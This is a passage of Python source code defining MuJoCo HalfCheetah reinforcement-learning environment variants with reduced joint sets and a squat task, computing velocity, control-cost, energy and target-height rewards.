observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3dofb(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_3dof_back.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_3dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_3dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dof.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv2(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dofv2.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bfoot','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bshin','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bshin','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv5(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dofv5.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahSquat2dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dofsquat.xml',
distance_weigth=5.0,
health_weight=1,
horizontal_weight=0.1, ##
ctrl_cost_weight=0.,
reset_noise_scale=0.1,
healthy_z_range=(0.2, 1),
terminate_when_unhealthy=False, ##
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
if terminate_when_unhealthy:
healthy_reward=1.0
else:
healthy_reward=0
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._healthy_reward = healthy_reward
self._health_weight=health_weight
self._distance_weigth = distance_weigth
self._horizontal_weight=horizontal_weight
self._terminate_when_unhealthy = terminate_when_unhealthy
self._healthy_z_range = healthy_z_range
self.target_low=0.25#0.45
self.target_high=0.7#0.6
self.joint_list=['bshin','fshin']
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.target_pos = np.asarray([0, 0, 0])
self.target_site=0
self.flipstep=75
self.timestep=0
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
@property
def is_healthy(self):
# state = self.state_vector()
# state = self.get_body_com("torso")
state = self.sim.data.get_geom_xpos('head')
min_z, max_z = self._healthy_z_range
is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)
return is_healthy
@property
def healthy_reward(self):
return float(
self.is_healthy
or self._terminate_when_unhealthy
) * self._healthy_reward
@property
def done(self):
done = (not self.is_healthy
if self._terminate_when_unhealthy
else False)
return done
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
#x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
self.timestep += 1
#x_position_after = self.sim.data.qpos[0]
#x_velocity = ((x_position_after - x_position_before)
# / self.dt)
ctrl_cost = np.sum(np.square(action))#self.control_cost(action)
healthy_reward = self.healthy_reward
vec = self.get_body_com("torso")[2] - self.target_pos[2]
reward_dist = np.linalg.norm(vec)
horizontal_penalty=np.abs(sum([0, 0, 1] - self.sim.data.geom_xmat[1][6:9]))
#forward_reward = x_velocity#self._forward_reward_weight *
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
#reward = forward_reward - ctrl_cost
ori_reward = - self._distance_weigth * reward_dist \
- self._ctrl_cost_weight * ctrl_cost \
- self._horizontal_weight * horizontal_penalty \
+ self._health_weight * healthy_reward
done = self.done
if self.timestep % self.flipstep == 0 and self.timestep != 0: # 2
if self.target_pos[2] <= self.target_low:
self.target_pos[2] = self.target_high
elif self.target_pos[2] >= self.target_high:
self.target_pos[2] = self.target_low
self.target_pos[0] = self.get_body_com("torso")[0]
self.target_pos[1] = self.get_body_com("torso")[1]
self.sim.data.site_xpos[self.target_site]= self.target_pos
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
# energy = energy + np.abs(action[i]) * delta_theta
energy = energy + np.sum(np.square(delta_theta))
if not self._terminate_when_unhealthy:
unhealty_penalty = -5
if not self.is_healthy:
ori_reward += unhealty_penalty
final_reward =ori_reward- self.energy_weights*energy
observation = self._get_obs()
info = {
'energy' : energy,
'reward_dist': -reward_dist,
'reward_ctrl': -ctrl_cost,
'horizontal_penalty': -horizontal_penalty,
'reward_survive': healthy_reward,
'ori_reward': ori_reward,
}
return observation, final_reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
